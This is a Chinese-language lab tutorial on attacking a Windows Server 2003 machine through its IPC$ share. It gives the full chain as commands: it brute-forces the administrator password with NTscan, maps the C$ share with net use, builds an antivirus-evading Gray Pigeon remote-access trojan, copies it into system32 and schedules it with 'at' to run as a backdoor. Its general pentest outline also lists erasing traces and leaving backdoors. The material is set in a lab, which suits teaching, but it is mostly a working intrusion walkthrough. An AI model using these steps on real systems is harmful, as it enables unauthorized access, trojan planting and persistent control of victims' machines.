渗透基本流程+漏洞利用之IPC$

1. 渗透基本流程

  1. 授权
  2. 信息收集
  3. 扫描漏洞
  4. 漏洞利用
  5. 提权(shell环境、桌面环境、最高权限)
  6. 毁尸灭迹
  7. 留后门
  8. 渗透测试报告

2. 漏洞利用之IPC$

2.0 实验准备

winXP 建立共享文件夹share

win server2003

2.1 扫描端口

  1. 利用软件Scanport 或则Nmap扫描端口

    发现win server2003的445/139端口开放

  2. 手工测试端口号开放:
    telnet IP地址 测试端口

2.2 漏洞利用之IPC$

进行暴力破解服务器密码:NTscan

NTscan解密的原理还是从字典库ping 目标ip加密码,所以我们做实验的时候NT_pass中要有服务器正确密码。

ConnetShare选择:IP$

2.3 将远程盘映射到本地

winXP将win2003的共享文件夹映射到本地。

winXP dos命令中

1
2
3
4
5
6
cd:\\                                    #进入c盘中
net use f: \\192.168.133.133\share 200816hy /user:administrator #将win2003的共享文件夹映射到winXP本地f盘(f盘原本是不存在的,这里是虚拟的映射)(格式:net use f: \\192.168.133.133\share 密码 /user:用户)

net use f: /del #删除映射的f盘
或者:net use * /del
(可以把share改成其他路径,例如c$是c盘;ipc$是空链接,是整个电脑)

或者:

winXP中”我的电脑“右击->映射网络驱动器

2.4 映射后的后期查看

winXP dos命令:

1
2
3
4
cd c:\\                   #进入c盘
dir \\192.168.133.133\share #查看服务器win2003的share文件夹
dir \\192.168.133.133\c$ #查看服务器win2003的C盘

2.5 生成木马

利用灰鸽子软件:鸽子牧民战天免杀专版0912

  1. 配置服务程序
  2. 生成木马程序,移动到winXP的C盘

2.6 植入木马(留后门)

winXP dos命令

1
2
cd c:\\
copy c:\Server.exe \\192.168.133.133\c$\windows\system32 #server.exe是木马程序,将木马程序复制到win2003的c:\\windows\system32下

2.7 设置计划任务自动执行木马:

winXP dos命令:

1
2
3
4
net time \\192.168.133.133               #查看win2003的当下时间
at \\192.168.133.133 xx:xx "c:\windows\system32\Server.exe" #在xx:xx让win2003执行木马程序
at \\192.168.133.133 #查看建立的作业状态
at \\192.168.133.133 xx:xx "c:\windows\system32\Server.exe"

2.8 等待肉鸡上线